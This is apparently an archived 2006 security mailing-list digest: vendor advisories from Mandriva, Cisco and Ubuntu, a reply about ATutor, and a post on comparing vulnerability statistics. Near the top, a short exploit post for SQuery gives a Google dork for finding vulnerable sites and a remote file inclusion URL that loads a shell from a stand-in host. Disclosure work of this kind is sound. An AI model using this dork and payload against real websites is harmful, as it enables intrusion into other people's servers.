Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org

iD8DBQFEsucaIR7qMdg1EfYRAiQgAKC/hRB8FFMkKYTUD3P3qSLAxXAo/wCg7n+j
6z+13jxmSlgZaA9WKenkMB0=
=W8Nz
-END PGP SIGNATURE-

SQuery <= 4.5(libpath) Remote File Inclusion Exploit

[SHiKaA-]

=

=SQuery <= 4.5(libpath) Remote File Inclusion Exploit   |

 |

 |

=

=Worked On : ALL VERSIONS |

 |

=Critical Level : Dangerous   |

 |

=Gug Found In : gore.php  |

=

= Dork :  "SQuery 4.5" |"SQuery 4.0" |"SQuery 3.9" |

inurl:"modules.php?name=SQuery" |


  |


  |

= http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?

  |


  |

===|

=Discoverd By : SHiKaA

=Conatact : SHiKaA-[at]hotmail.com


GreetZ :  BlAcK_BiRd  Kambaa  NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA

FEGLA 3amer

Re: ATutor 1.5.3 Cross Site Scripting

[info]

The XXS issues have been patched and will be available in the coming 
maintenance release (1.5.3_pl1)


The mentioned SQL injection vulnerability is not possible. Please remove it.

[ MDKA-2006:119 ] - Updated ppp packages fix plugin vulnerability

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory  MDKA-2006:119
 http://www.mandriva.com/security/
 ___
 
 Package : ppp
 Date: July 10, 2006
 Affected: 2006.0
 ___
 
 Problem Description:
 
 Marcus Meissner discovered that pppd's winbind plugin did not check for
 the result of the setuid() call which could allow an attacker to
 exploit this on systems with certain PAM limits enabled to execute the
 NTLM authentication helper as root.  This could possibly lead to
 privilege escalation dependant upon the local winbind configuration.
 
 Updated packages have been patched ot correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2194
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 75455046d94e92441bbe2e0e2b773082  2006.0/RPMS/ppp-2.4.3-9.1.20060mdk.i586.rpm
 f567cca02725deb575a8f13452234664  
2006.0/RPMS/ppp-devel-2.4.3-9.1.20060mdk.i586.rpm
 8872f55ecea3ba6e001c4bca4972199e  
2006.0/RPMS/ppp-dhcp-2.4.3-9.1.20060mdk.i586.rpm
 a741c885635d908b200a1bf60232b71f  
2006.0/RPMS/ppp-pppoatm-2.4.3-9.1.20060mdk.i586.rpm
 058a637fd471f0a4f2791fbbfe2f763b  
2006.0/RPMS/ppp-pppoe-2.4.3-9.1.20060mdk.i586.rpm
 3e0a3e901f9cab4fa879fec18fb6ac92  
2006.0/RPMS/ppp-prompt-2.4.3-9.1.20060mdk.i586.rpm
 b2ed30cae68e544fc63c794742577f1a  
2006.0/RPMS/ppp-radius-2.4.3-9.1.20060mdk.i586.rpm
 2578865b6af5300d3027aa62eaa1466b  2006.0/SRPMS/ppp-2.4.3-9.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 b00f91f85a11f75dfb3a038a15fee3e5  
x86_64/2006.0/RPMS/ppp-2.4.3-9.1.20060mdk.x86_64.rpm
 63c00cf07b9b2729e4820fb270372800  
x86_64/2006.0/RPMS/ppp-devel-2.4.3-9.1.20060mdk.x86_64.rpm
 90fe962badb7773bc747b2a595c42e2e  
x86_64/2006.0/RPMS/ppp-dhcp-2.4.3-9.1.20060mdk.x86_64.rpm
 24074e562bef8364308931f71cd66644  
x86_64/2006.0/RPMS/ppp-pppoatm-2.4.3-9.1.20060mdk.x86_64.rpm
 cf3ec260bf90e2b086fa02d4267bc5c2  
x86_64/2006.0/RPMS/ppp-pppoe-2.4.3-9.1.20060mdk.x86_64.rpm
 5455b8bd4daf610893ff36031ead5167  
x86_64/2006.0/RPMS/ppp-prompt-2.4.3-9.1.20060mdk.x86_64.rpm
 2dcb7f91af4fddeec7b83b396cd4d7f0  
x86_64/2006.0/RPMS/ppp-radius-2.4.3-9.1.20060mdk.x86_64.rpm
 2578865b6af5300d3027aa62eaa1466b  
x86_64/2006.0/SRPMS/ppp-2.4.3-9.1.20060mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEswtAmqjQ0CJFipgRAjifAKDKvH8Gv/mS+pooTMJbQb7KN3Di7wCg9pmY
F1TbQTxk905x7K8bqg0ddi0=
=y43d
-END PGP SIGNATURE-

Cisco Security Advisory: Cisco Router Web Setup Ships with Insecure Default IOS Configuration

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Cisco Security Advisory: 
Cisco Router Web Setup Ships with Insecure Default IOS Configuration

Document ID: 70650

Advisory ID: cisco-sa-20060712-crws

http://www.cisco.com/warp/public/707/cisco-sa-20060712-crws.shtml

Revision 1.0

For Public Release 2006 July 12 1600 UTC (GMT)

- ---

Contents


Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- ---

Summary
===

The default Cisco IOS configuration shipped with the Cisco Router Web
Setup (CRWS) application allows the execution of commands at privilege
level 15 through the Cisco IOS HTTP (Hypertext Transfer Protocol)
server web interface without requiring authentication credentials.
Privilege level 15 is the highest privilege level on Cisco IOS?
devices.

Fixed versions of the CRWS application have been modified by Cisco to
provide a more secure default IOS configuration and additional
functionality with regards to the Cisco IOS HTTP server web interface.

This issue does not require a Cisco IOS software upgrade or a CRWS
software upgrade. Customers who decide to upgrade to a fixed version of
CRWS and deploy the new default IOS configuration will not need to
deploy the suggested workarounds. Customers who elect NOT to upgrade to
a fixed CRWS version, or customers upgrading to a fixed CRWS version
who keep their existing configuration should implement the workarounds
identified in this advisory.

Additional information on the new default IOS configuration shipped
with the CRWS application is available in the Details section of this
advisory.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20060712-crws.shtml.

Affected Products
=

Vulnerable Products
+--

The following Cisco routers whose configurations have been based on the
default IOS configuration shipped with any version of CRWS prior to
version 3.3.0 build 31 may be affected by this vulnerability:

  * Cisco 806
  * Cisco 826
  * Cisco 827
  * Cisco 827H
  * Cisco 827-4v
  * Cisco 828
  * Cisco 831
  * Cisco 836
  * Cisco 837
  * Cisco SOHO 71
  * Cisco SOHO 76
  * Cisco SOHO 77
  * Cisco SOHO 77H
  * Cisco SOHO 78
  * Cisco SOHO 91
  * Cisco SOHO 96
  * Cisco SOHO 97

Products Confirmed Not Vulnerable
+

Any of the previously listed Cisco routers whose IOS configuration is
not based on the default IOS configuration shipped with the CRWS
application are not vulnerable.

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

The Cisco Router Web Setup tool (CRWS) provides a graphical user
interface (GUI) for configuring Cisco SOHO and Cisco 800 series
routers, and allows users to set up their routers quickly and easily.
The GUI is accessed through the Cisco IOS HTTP server, which is enabled
on the default IOS configuration shipped with the CRWS application.

The Cisco IOS HTTP server uses the "enable password" (assuming one has
been configured) as its default authentication mechanism. Other
authentication mechanisms can be configured, including the use of a
local user database, an external RADIUS (Remote Authentication Dial In
User Service) or an external TACACS+ (Terminal Access Controller Access
Control System) server. The default IOS configuration shipped with the
CRWS application does not include an "enable password" or an "enable
secret" command, allowing access to the Cisco IOS HTTP server interface
at any privilege level, up to and including privilege level 15, without
providing authentication credentials. Privilege level 15 is the highest
privilege level on Cisco IOS devices.

To resolve this vulnerability, Cisco has made changes to the default
IOS configuration shipped with the CRWS application and to the CRWS
application itself. Those changes are as follows:

  * The addition of a default username and password combination to be
used during initial device configuration.

Note:  CRWS will prompt the user to change those default
credentials during its first invocation. It is strongly recommended
for customers to remove those default credentials from the device
configuration by using the Cisco IOS CLI (command line interface)
if not planning to use the CRWS application for device
configuration.

  * The addition of an authentication mechanism for the Cisco IOS HTTP
server to authenticate users based on the local user database.

  * The addition of an access restriction to only allow connections to
the Cisco IOS HTTP server from the internal network, using the
addressi

Cisco Security Advisory: Multiple Cisco Unified CallManager Vulnerabilities

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Cisco Security Advisory: Multiple Cisco Unified CallManager
Vulnerabilities

Advisory ID: cisco-sa-20060712-cucm

http://www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml

Revision 1.0

For Public Release 2006 July 12 1600 UTC (GMT)

- -

Contents


Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- -

Summary
===

Cisco Unified CallManager (CUCM) 5.0 has Command Line Interface (CLI)
and Session Initiation Protocol (SIP) related vulnerabilities. There
are potential privilege escalation vulnerabilities in the CLI which
may allow an authenticated administrator to access the base operating
system with root privileges. There is also a buffer overflow
vulnerability in the processing of hostnames contained in a SIP
request which may result in arbitrary code execution or cause a
denial of service. These vulnerabilities only affect Cisco Unified
CallManager 5.0.

Cisco has made free software available to address these
vulnerabilities for affected customers. There are no workarounds
available to mitigate the effects of these vulnerabilities.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml

Affected Products
=

Vulnerable Products
+--

Only Cisco Unified CallManager versions 5.0(1), 5.0(2), 5.0(3) and
5.0(3a) are affected.

The version of CallManager software running can be determined
navigating to Show > Software in the CUCM IPT Platform administration
interface or by running the command show version active in the CLI.

Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by these
vulnerabilities, including all previous versions of Cisco Unified
CallManager.

Details
===

Cisco Unified CallManager is the software-based call-processing
component of the Cisco IP telephony solution which extends enterprise
telephony features and functions to packet telephony network devices
such as IP phones, media processing devices, voice-over-IP (VoIP)
gateways, and multimedia applications.

The CallManager CLI provides a backup management interface to the
system in order to diagnose and troubleshoot the primary HTTPS-based
management interfaces. The CLI, which runs as the root user, contains
two vulnerabilities in the parsing of commands. The first
vulnerability may allow an authenticated CUCM administrator to
execute arbitrary operating system programs as the root user. The
second vulnerability may allow output redirection of a command to a
file or a folder specified on the command line.

Cisco Unified CallManager supports the coexistence of both SCCP and
SIP phones, allowing for migration to SIP while protecting
investments in existing devices. CUCM contains a buffer overflow
vulnerability in the processing of excessively long hostnames which
may be included in a SIP request.

These issues are documented by the following Cisco bug IDs:

  * CSCse11005 ( registered customers only) Certain CLI commands
allow execution of arbitrary Linux commands
  * CSCse31704 ( registered customers only) User able to redirect
command output to a file folder
  * CSCsd96542 ( registered customers only) SD-GA: CCM cores when SIP
request line host name has ASCII overflow

Impact
==

Successful exploitation of the CLI vulnerability documented in Cisco
bug ID CSCse11005 may allow authenticated CLI users to execute
arbitrary operating system commands with root privileges.
Exploitation of the CLI vulnerability documented in Cisco bug ID
CSCse31704 may allow an authenticated CLI user to modify or overwrite
any file on the filesystem as the root user.

Exploitation of the SIP vulnerability documented in Cisco bug ID
CSCsd96542 may result in arbitrary code execution or a denial of
service.

Software Version and Fixes
==

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.

Workarounds
===

There are no workarounds for these vulnerabilities.

Obtaining Fixed Software


Cisco will make free software available to

[USN-315-1] libmms, xine-lib vulnerabilities

[Martin Pitt]

=== 
Ubuntu Security Notice USN-315-1  July 12, 2006
libmms, xine-lib vulnerabilities
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  libxine1 1.0-1ubuntu3.8

Ubuntu 5.10:
  libmms0  0.1-0ubuntu1.2
  libxine1c2   1.0.1-1ubuntu10.4

Ubuntu 6.06 LTS:
  libxine-main11.1.1+ubuntu2-7.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Matthias Hopf discovered several buffer overflows in libmms. By
tricking a user into opening a specially crafted remote multimedia
stream with an application using libmms, a remote attacker could
exploit this to execute arbitrary code with the user's privileges.

The Xine library contains an embedded copy of libmms, and thus needs
the same security update.


Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0-1ubuntu3.8.diff.gz
  Size/MD5: 5811 6a41fae784ef1516888d20a8ec08c663

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0-1ubuntu3.8.dsc
  Size/MD5: 1070 9880832522e9ec56d035abe93b4e2471

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.orig.tar.gz
  Size/MD5:  7384258 96e5195c366064e7778af44c3e71f43a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.8_amd64.deb
  Size/MD5:   106922 2b8375b1f380d86fcf366a18d1f3b902

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.8_amd64.deb
  Size/MD5:  3567630 d752e90e7d26650aea95d367dcf84790

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.8_i386.deb
  Size/MD5:   106932 d95e46c206ca84e80a98e01ad404ef71

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.8_i386.deb
  Size/MD5:  3750548 743fae494abdd778263762de0100a7c9

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.8_powerpc.deb
  Size/MD5:   106944 2719a6a92c6e4cbbbd884ecdbfe7122e

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.8_powerpc.deb
  Size/MD5:  3925764 979cd9f6ba73ae35cdce5a965f3068a9

Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms_0.1-0ubuntu1.2.diff.gz
  Size/MD5: 5750 26bc4a3aa10f4c803fa97f9544ecd0bc

http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms_0.1-0ubuntu1.2.dsc
  Size/MD5:  607 592210915bc702a6d9e94ecfe0711fa7

http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms_0.1.orig.tar.gz
  Size/MD5:   317089 ebd88537af9875265e41ee65603ecd1a

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.4.diff.gz
  Size/MD5:10600 1e73a41d99fb1fb4b2eddb43895caeac

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.4.dsc
  Size/MD5: 1189 9f04d287f5ba301eaf6fd2f9e066e3ae

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz
  Size/MD5:  7774954 9be804b337c6c3a2e202c5a7237cb0f8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms-dev_0.1-0ubuntu1.2_amd64.deb
  Size/MD5:19984 21d4c0a07f60aeb1550f198722d9ec99

http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms0_0.1-0ubuntu1.2_amd64.deb
  Size/MD5:16360 bf82acc8e708dbf4605fb6be016e0e40

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.4_amd64.deb
  Size/MD5:   108948 92beceb19f7806a47992ca8d6fcb5c9c

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.4_amd64.deb
  Size/MD5:  3611402 24bcea7ae2e5a4b5776213fd551851f8

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms-dev_0.1-0ubuntu1.2_i386.deb
  Size/MD5:18312 bbe36a4ac6b616c24be2c7417a44bf26

http://security.ubuntu.com/ubuntu/pool/main/libm/libmms/libmms0_0.1-0ubuntu1.2_i386.deb
  Size/MD5:15116 0ed843f14b406370a7a2426ba5c8f459

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.4_i386.deb
  Size/MD5:   108956 2c9357c05d883747cb7c1c8218e7a257

http://security.ubuntu.com/ubuntu/pool/main/x/xine

[USN-316-1] installer vulnerability

[Martin Pitt]

=== 
Ubuntu Security Notice USN-316-1  July 12, 2006
Installer vulnerability
https://launchpad.net/bugs/48350
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  passwd   1:4.0.13-7ubuntu3.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Iwan Pieterse discovered that, if you select "Go Back" at the final
message displayed by the alternate or server CD installer ("Installation
complete") and then continue with the installation from the installer's
main menu, the root password is left blank rather than locked. This was
due to an error while clearing out the root password from the
installer's memory to avoid possible information leaks.

Installations from the alternate or server CDs when the user selected
"Continue" when the "Installation complete" message was first displayed
are not affected by this bug. Installations from the desktop CD are not
affected by this bug at all.

When you upgrade your passwd package to the newest version, it will
detect this condition and lock the root password if it was previously
blank. The next point release of Ubuntu 6.06 LTS will include a
corrected installer.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13-7ubuntu3.2.diff.gz
  Size/MD5:   204800 1b29e1615364944d98ea95498d6058b8

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13-7ubuntu3.2.dsc
  Size/MD5:  885 8ccf50d026fa2c4cffe85330f0d0985a

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/shadow_4.0.13.orig.tar.gz
  Size/MD5:  1622557 034fab52e187e63cb52f153bb7f304c8

http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup_1.1ubuntu4.dsc
  Size/MD5:  678 544762def71fb062b6d6f5484a4d7c45

http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup_1.1ubuntu4.tar.gz
  Size/MD5:98334 f8d648ce6a9a007740b0e175b92385eb

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup-udeb_1.1ubuntu4_all.udeb
  Size/MD5:79418 4ec2af1d5e09f129d486c142575f4081

http://security.ubuntu.com/ubuntu/pool/main/u/user-setup/user-setup_1.1ubuntu4_all.deb
  Size/MD5:   161864 bc876d6099a323cebd2ffc94df41db06

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_amd64.deb
  Size/MD5:   249450 bfdba1450cbe14f6c71f5d9dee5df9b3

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_amd64.deb
  Size/MD5:   683510 547ad48ac45f6f11cacbd268f42b152a

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_i386.deb
  Size/MD5:   240938 8500a4c2ab53f11b3fb8cb7fb4e00c78

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_i386.deb
  Size/MD5:   616346 a29d90e0ae7c7c70cbeffcbfba6bf04e

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_powerpc.deb
  Size/MD5:   251380 bd408187e20f19222e2b4fefe8706552

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_powerpc.deb
  Size/MD5:   665158 4975fe8598b4a8adc98fabcee1b4cb8e

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.13-7ubuntu3.2_sparc.deb
  Size/MD5:   239930 85dde4bfa6d09491338f70efe9d6d336

http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.13-7ubuntu3.2_sparc.deb
  Size/MD5:   620124 b0fcdadde2568b1a8324e2500718a18b


signature.asc
Description: Digital signature

[USN-313-1] OpenOffice.org vulnerabilities

[Martin Pitt]

===
Ubuntu Security Notice USN-313-1  July 11, 2006
openoffice.org-amd64, openoffice.org vulnerabilities
CVE-2006-2198, CVE-2006-2199, CVE-2006-3117
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  openoffice.org-bin1.1.3-8ubuntu2.4

Ubuntu 6.06 LTS:
  openoffice.org-base   2.0.2-2ubuntu12.1
  openoffice.org-common 2.0.2-2ubuntu12.1
  openoffice.org-core   2.0.2-2ubuntu12.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Ubuntu 5.10 is also affected by these flaws. Updated packages will be
provided shortly.

Details follow:

It was possible to embed Basic macros in documents in a way that
OpenOffice.org would not ask for confirmation about executing them. By
tricking a user into opening a malicious document, this could be
exploited to run arbitrary Basic code (including local file access and
modification) with the user's privileges. (CVE-2006-2198)

A flaw was discovered in the Java sandbox which allowed Java applets
to break out of the sandbox and execute code without restrictions.  By
tricking a user into opening a malicious document, this could be
exploited to run arbitrary code with the user's privileges. This
update disables Java applets for OpenOffice.org, since it is not
generally possible to guarantee the sandbox restrictions.
(CVE-2006-2199)

A buffer overflow has been found in the XML parser. By tricking a user
into opening a specially crafted XML file with OpenOffice.org, this
could be exploited to execute arbitrary code with the user's
privileges. (CVE-2006-3117)


Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-amd64/openoffice.org-amd64_1.1.3-8ubuntu2.4-1.diff.gz
  Size/MD5:28789 514ea84d6f71ccf9db3ef260d5208659

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-amd64/openoffice.org-amd64_1.1.3-8ubuntu2.4-1.dsc
  Size/MD5:  711 b1b158d017923995de9baa90d78af405

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-amd64/openoffice.org-amd64_1.1.3-8ubuntu2.4.orig.tar.gz
  Size/MD5: 213206527 dc7f27c5ce697aeca39f8622e19d8b81

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_1.1.3-8ubuntu2.4.diff.gz
  Size/MD5:  6775773 452a4984ad6e9099c90e535d4b8450e0

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_1.1.3-8ubuntu2.4.dsc
  Size/MD5: 2970 fe922d379fc59ff63aa1f138bdd623d5

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_1.1.3.orig.tar.gz
  Size/MD5: 166568714 5250574bad9906b38ce032d04b765772

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-af_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2635378 b8fa9808c55979fb401b5e54712790d5

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-ar_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2680962 9b14a2caeb1198c5754c04f81f53281b

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-ca_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2678222 98170fad141dd06f8126450c3aebcbee

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-cs_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  3575066 d207819f21a982a4125a3199b14684cd

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-cy_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2649914 bb4c611d7ed3323d48aa5dc29318f6b8

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-da_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  3568972 e75a586b586e765d07e6e82723613f8f

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-de_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  3441302 574d06d219935433da8fc72faaa854e3

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-el_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2729146 058e25d98f3d4f2d1b02bbfbbf030319

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-en_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  3513912 6b6e6689293d2f1a6c31c7dbae8606a5

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-es_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  3548974 9f8c29a74cd142b9f47d06bc79830653

http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-et_1.1.3-8ubuntu2.4_all.deb
  Size/MD5:  2632886 66825e4ed7f75cb77c1f2f8ded32acc2

http://security.ubuntu.com/ubuntu/pool/main/o/openof

Re: LAMP vs Microsoft

[Steven M. Christey]

Researcher "fads," differences in vendor disclosure practices, and
vulnerability database editorial policies will heavily influence
vulnerability statistics, to the point where comparing them is not
very informative (at least, you're not getting the whole picture).
You also have the challenge of defining equivalent platforms to
compare against each other.

However, there is one area where you can really compare 2 products to
each other: implementation of standards.  These standards could be
protocol-based, file-based (e.g. image formats), or scheme-based (such
as authentication or crypto schemes).

It would be great to see some more focused efforts that are based on
standards that are implemented in a cross-OS fashion.  This would
allow the community to harness the power of fuzzing and suite-testing
in a narrow fashion.  We would only get narrow answers, of course -
"these kinds of implementation bugs were looked for and found on these
kinds of products" - but it would be much more manageable and
measurable, and above all, we would be comparing apples to apples.

If someone is interested in pursuing this further, you could probably
start with past data from PROTOS and other past fuzzing/suite-testing
results.

- Steve